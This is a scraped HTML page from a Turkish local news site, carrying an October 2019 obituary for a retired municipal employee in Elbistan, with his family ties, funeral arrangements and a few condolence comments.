title="EÜAŞ komisyonu çalışmalarını yapıyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/10/Ysimsiz-1_25.jpg" alt="EÜAŞ komisyonu çalışmalarını yapıyor" class="pull-left" /> <div class="caption-line"><p>EÜAŞ komisyonu çalışmalarını yapıyor</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-osb-ziyaretlerini-surduruyor-h64433.html" title="Kaymakam Demir, OSB ziyaretlerini sürdürüyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/10/Ysimsiz-1_24.jpg" alt="Kaymakam Demir, OSB ziyaretlerini sürdürüyor" class="pull-left" /> <div class="caption-line"><p>Kaymakam Demir, OSB ziyaretlerini sürdürüyor</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/baris-pinari-harekatindan-goksuna-aci-haber-h64427.html" title="Barış Pınarı Harekatı’ndan Göksun’a acı haber" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/10/Ysimsiz-1_23.jpg" alt="Barış Pınarı Harekatı’ndan Göksun’a acı haber" class="pull-left" /> <div class="caption-line"><p>Barış Pınarı Harekatı’ndan Göksun’a acı...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistana-3u-ozellikli-bransta-4-uzman-hekim-kadrosu-h64426.html" title="Elbistan’a, 3’ü özellikli branşta 4 uzman hekim kadrosu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/10/6cbe36af-9c77-417e-b0e7-7a0c5bb33648.jpg" alt="Elbistan’a, 3’ü özellikli branşta 4 uzman hekim kadrosu" class="pull-left" /> <div class="caption-line"><p>Elbistan’a, 3’ü özellikli branşta 4...</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Ökkeş Kısaca</h1> <h2 class="lead" itemprop="description"><strong>Ökkeş Kısaca</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2019-10-11 11:58:52" content="2019-10-11T11:58:52+02:00">11 Ekim 2019 Cuma 11:58</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/okkes_kisaca_h64429_2d76e.jpg" alt="Ökkeş Kısaca" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- haber resim altı --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-5471929680897605" data-ad-slot="6876227685"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal"><span style="font-family: Arial, sans-serif; font-size: 16px;">Aslen Ekinözü Türkeli Mahallesinden olup Elbistan Cumhuriyet Mahallesi’nde ikamet eden merhum Gani ve Gülizar Kısaca’ın oğlu emekli vaiz Kerim Kısaca, merhum Haki Kısaca ve Kıral Camii İmam Hatibi Şaban Kısaca’nın kardeşleri Mehmet Yaman, Ramazan Yıldırım, Mikail Alkılınç, Cuma Yılmaz ve İbrahim Önat bacanakların kayınbiraderi emekli belediye personeli Ökkeş Kısaca vefat etmiştir. Cenazesi, 11 Ekim Cuma günü ikindi namazına müteakip Hocazade Cami’inde cenaze namazı kılınarak Hocazade Mezarlığına defnedilecektir. Kur’an-ı Kerim’i, Hocazade Camii yanında kendi hanelerinde okunacaktır.</span><br /> <span style="font-family: Arial, sans-serif; font-size: 16px;">Taziye için telefon:</span><br /> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">&#160;0553 166 0692 kardeşi Şaban.</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;"><o:p></o:p></span></p> <p class="MsoNormal"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">&#160;</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;"><o:p></o:p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/euas-komisyonu-calismalarini-yapiyor-h64434.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-osb-ziyaretlerini-surduruyor-h64433.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/guvenlik-korucularindan-baris-pinari-harekatina-tam-destek-h64432.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/basaran-devletimizin-ve-kahraman-ordumuzun-emrindeyiz-h64431.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/turkcell-calisanlari-a-milli-takim-formasi-giyerek-hizmet-veriyor-h64430.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/fren-yerine-yanlislikla-gaza-basti-markete-girdi-h64428.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baris-pinari-harekatindan-goksuna-aci-haber-h64427.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistana-3u-ozellikli-bransta-4-uzman-hekim-kadrosu-h64426.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tkdkdan-elbistana-5-hayvancilik-yatirimi-destegi-h64425.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/unaldan-baris-pinari-harekati-paylasimi-h64424.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/polis-ve-jandarmadan-tum-servis-suruculeri-ile-toplanti-h64423.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-ozcan-allah-ordumuzu-muzaffer-eylesin-h64422.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/canli-hayvan-saticisi-bakici-ve-nakliyeci-egitimi-verilecek-h64420.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanin-sultanlarindan-baskan-gurbuze-galibiyet-sozu-h64419.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baris-pinari-harekatinda-son-durum-h64417.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-semalarinda-gun-boyu-ucan-ucagin-sirri-cozuldu-h64416.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ulusal-deprem-tatbikati-gercegini-aratmadi-h64415.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-taklit-urun-operasyonu-h64414.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/rektor-ozgulden-etsoya-ziyaret-h64413.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/mutlucan-sekerde-kuspe-paketleme-tesisi-hizmete-girdi-h64412.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kamedden-madde-bagimliligi-semineri-h64411.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-elkud-ekibini-misafir-etti-h64410.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bassavci-ormancidan-baskan-sahine-ziyaret-h64408.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/silahli-saldirilar-ile-ilgili-4-kisi-tutuklandi-h64403.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> <div class="carousel-caption"> <h2> <span style="font-size:">Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/euas-komisyonu-calismalarini-yapiyor-h64434.html" title="EÜAŞ komisyonu çalışmalarını yapıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/euas_komisyonu_calismalarini_yapiyor_h64434_4dc39.jpg" alt="EÜAŞ komisyonu çalışmalarını yapıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">EÜAŞ komisyonu çalışmalarını yapıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-osb-ziyaretlerini-surduruyor-h64433.html" title="Kaymakam Demir, OSB ziyaretlerini sürdürüyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/kaymakam_demir_osb_ziyaretlerini_surduruyor_h64433_c904f.jpg" alt="Kaymakam Demir, OSB ziyaretlerini sürdürüyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir, OSB ziyaretlerini sürdürüyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/guvenlik-korucularindan-baris-pinari-harekatina-tam-destek-h64432.html" title="Güvenlik korucularından Barış Pınarı Harekatı’na tam destek"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/guvenlik_korucularindan_baris_pinari_harekatina_tam_destek_h64432_2bc84.jpg" alt="Güvenlik korucularından Barış Pınarı Harekatı’na tam destek" /> <div class="carousel-caption"> <h2> <span style="font-size:">Güvenlik korucularından Barış Pınarı Harekatı’na tam destek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/basaran-devletimizin-ve-kahraman-ordumuzun-emrindeyiz-h64431.html" title="Başaran: “Devletimizin ve kahraman ordumuzun emrindeyiz”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/basaran_devletimizin_ve_kahraman_ordumuzun_emrindeyiz_h64431_d59c3.jpg" alt="Başaran: “Devletimizin ve kahraman ordumuzun emrindeyiz”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başaran: “Devletimizin ve kahraman ordumuzun emrindeyiz”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/turkcell-calisanlari-a-milli-takim-formasi-giyerek-hizmet-veriyor-h64430.html" title="Turkcell çalışanları A Milli Takım forması giyerek hizmet veriyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/turkcell_calisanlari_a_milli_takim_formasi_giyerek_hizmet_veriyor_h64430_be604.jpg" alt="Turkcell çalışanları A Milli Takım forması giyerek hizmet veriyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Turkcell çalışanları A Milli Takım forması giyerek hizmet veriyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/fren-yerine-yanlislikla-gaza-basti-markete-girdi-h64428.html" title="Fren yerine yanlışlıkla gaza bastı, markete girdi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/fren_yerine_yanlislikla_gaza_basti_markete_girdi_h64428_44899.jpg" alt="Fren yerine yanlışlıkla gaza bastı, markete girdi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Fren yerine yanlışlıkla gaza bastı, markete girdi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baris-pinari-harekatindan-goksuna-aci-haber-h64427.html" title="Barış Pınarı Harekatı’ndan Göksun’a acı haber"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/baris_pinari_harekatindan_goksuna_aci_haber_h64427_28f24.jpg" alt="Barış Pınarı Harekatı’ndan Göksun’a acı haber" /> <div class="carousel-caption"> <h2> <span style="font-size:">Barış Pınarı Harekatı’ndan Göksun’a acı haber</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistana-3u-ozellikli-bransta-4-uzman-hekim-kadrosu-h64426.html" title="Elbistan’a, 3’ü özellikli branşta 4 uzman hekim kadrosu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/elbistana_3u_ozellikli_bransta_4_uzman_hekim_kadrosu_h64426_2d86b.jpg" alt="Elbistan’a, 3’ü özellikli branşta 4 uzman hekim kadrosu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’a, 3’ü özellikli branşta 4 uzman hekim kadrosu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tkdkdan-elbistana-5-hayvancilik-yatirimi-destegi-h64425.html" title="TKDK’dan Elbistan’a 5 hayvancılık yatırımı desteği"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/tkdkdan_elbistana_5_hayvancilik_yatirimi_destegi_h64425_9bb7a.jpg" alt="TKDK’dan Elbistan’a 5 hayvancılık yatırımı desteği" /> <div class="carousel-caption"> <h2> <span style="font-size:">TKDK’dan Elbistan’a 5 hayvancılık yatırımı desteği</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/unaldan-baris-pinari-harekati-paylasimi-h64424.html" title="Ünal’dan Barış Pınarı Harekatı paylaşımı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/unaldan_baris_pinari_harekati_paylasimi_h64424_6d187.jpg" alt="Ünal’dan Barış Pınarı Harekatı paylaşımı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ünal’dan Barış Pınarı Harekatı paylaşımı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/polis-ve-jandarmadan-tum-servis-suruculeri-ile-toplanti-h64423.html" title="Polis ve jandarmadan tüm servis sürücüleri ile toplantı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/polis_ve_jandarmadan_tum_servis_suruculeri_ile_toplanti_h64423_1c997.jpg" alt="Polis ve jandarmadan tüm servis sürücüleri ile toplantı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Polis ve jandarmadan tüm servis sürücüleri ile toplantı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-ozcan-allah-ordumuzu-muzaffer-eylesin-h64422.html" title="Başkan Özcan: “Allah, ordumuzu muzaffer eylesin”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/baskan_ozcan_allah_ordumuzu_muzaffer_eylesin_h64422_08423.jpg" alt="Başkan Özcan: “Allah, ordumuzu muzaffer eylesin”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Özcan: “Allah, ordumuzu muzaffer eylesin”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/canli-hayvan-saticisi-bakici-ve-nakliyeci-egitimi-verilecek-h64420.html" title="Canlı hayvan satıcısı, bakıcı ve nakliyeci eğitimi verilecek"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/canli_hayvan_saticisi_bakici_ve_nakliyeci_egitimi_verilecek_h64420_93b06.jpg" alt="Canlı hayvan satıcısı, bakıcı ve nakliyeci eğitimi verilecek" /> <div class="carousel-caption"> <h2> <span style="font-size:">Canlı hayvan satıcısı, bakıcı ve nakliyeci eğitimi verilecek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-sultanlarindan-baskan-gurbuze-galibiyet-sozu-h64419.html" title="Elbistan’ın Sultanlarından Başkan Gürbüz’e galibiyet sözü"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/elbistanin_sultanlarindan_baskan_gurbuze_galibiyet_sozu_h64419_50fbc.jpg" alt="Elbistan’ın Sultanlarından Başkan Gürbüz’e galibiyet sözü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’ın Sultanlarından Başkan Gürbüz’e galibiyet sözü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baris-pinari-harekatinda-son-durum-h64417.html" title="Barış Pınarı Harekatı’nda son durum"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/baris_pinari_harekatinda_son_durum_h64417_30b72.jpg" alt="Barış Pınarı Harekatı’nda son durum" /> <div class="carousel-caption"> <h2> <span style="font-size:">Barış Pınarı Harekatı’nda son durum</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-semalarinda-gun-boyu-ucan-ucagin-sirri-cozuldu-h64416.html" title="Elbistan semalarında gün boyu uçan uçağın sırrı çözüldü"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/elbistan_semalarinda_gun_boyu_ucan_ucagin_sirri_cozuldu_h64416_a8d21.jpg" alt="Elbistan semalarında gün boyu uçan uçağın sırrı çözüldü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan semalarında gün boyu uçan uçağın sırrı çözüldü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ulusal-deprem-tatbikati-gercegini-aratmadi-h64415.html" title="Ulusal deprem tatbikatı gerçeğini aratmadı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/ulusal_deprem_tatbikati_gercegini_aratmadi_h64415_a7156.JPG" alt="Ulusal deprem tatbikatı gerçeğini aratmadı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ulusal deprem tatbikatı gerçeğini aratmadı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-taklit-urun-operasyonu-h64414.html" title="Elbistan’da taklit ürün operasyonu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/elbistanda_taklit_urun_operasyonu_h64414_9e371.jpg" alt="Elbistan’da taklit ürün operasyonu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’da taklit ürün operasyonu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/rektor-ozgulden-etsoya-ziyaret-h64413.html" title="Rektör Özgül’den ETSO’ya ziyaret"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/rektor_ozgulden_etsoya_ziyaret_h64413_37233.jpg" alt="Rektör Özgül’den ETSO’ya ziyaret" /> <div class="carousel-caption"> <h2> <span style="font-size:">Rektör Özgül’den ETSO’ya ziyaret</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/mutlucan-sekerde-kuspe-paketleme-tesisi-hizmete-girdi-h64412.html" title="Mutlucan Şeker’de küspe paketleme tesisi hizmete girdi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/mutlucan_sekerde_kuspe_paketleme_tesisi_hizmete_girdi_h64412_65af2.jpg" alt="Mutlucan Şeker’de küspe paketleme tesisi hizmete girdi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Mutlucan Şeker’de küspe paketleme tesisi hizmete girdi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kamedden-madde-bagimliligi-semineri-h64411.html" title="KAMED’den ‘madde bağımlılığı’ semineri"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/kamedden_madde_bagimliligi_semineri_h64411_bf93c.jpg" alt="KAMED’den ‘madde bağımlılığı’ semineri" /> <div class="carousel-caption"> <h2> <span style="font-size:">KAMED’den ‘madde bağımlılığı’ semineri</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-elkud-ekibini-misafir-etti-h64410.html" title="Kaymakam Demir, ELKUD ekibini misafir etti"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/kaymakam_demir_elkud_ekibini_misafir_etti_h64410_93ae8.jpg" alt="Kaymakam Demir, ELKUD ekibini misafir etti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir, ELKUD ekibini misafir etti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bassavci-ormancidan-baskan-sahine-ziyaret-h64408.html" title="Başsavcı Ormancı’dan Başkan Şahin’e ziyaret"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/bassavci_ormancidan_baskan_sahine_ziyaret_h64408_c8c08.jpg" alt="Başsavcı Ormancı’dan Başkan Şahin’e ziyaret" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başsavcı Ormancı’dan Başkan Şahin’e ziyaret</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/silahli-saldirilar-ile-ilgili-4-kisi-tutuklandi-h64403.html" title="Silahlı saldırılar ile ilgili 4 kişi tutuklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/10/silahli_saldirilar_ile_ilgili_4_kisi_tutuklandi_h64403_b4a22.jpg" alt="Silahlı saldırılar ile ilgili 4 kişi tutuklandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Silahlı saldırılar ile ilgili 4 kişi tutuklandı</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">8</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/vefatlar/okkes-kisaca-h64429.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(64429);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="64429" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="195ffb329d4f1665395890776d4865d571c5d34c" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> <div id="comment_list"> <div class="comment_box row-fluid" id="comment_270836"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Mehmet ağan İstanbul</b> <small class="time">3 saat önce</small> <p class="text">ALLAH rahmet eylesin mekanı cennet olur inşALLAH...</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Mehmet ağan İstanbul" id="270836"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like270836" onclick="like(270836,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike270836">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike270836" onclick="like(270836,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike270836">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_270841"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>derviş doğan</b> <small class="time">2 saat önce</small> <p class="text">ALLAH RAHMET EYLESİN</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@derviş doğan" id="270841"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like270841" onclick="like(270841,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike270841">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike270841" onclick="like(270841,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr 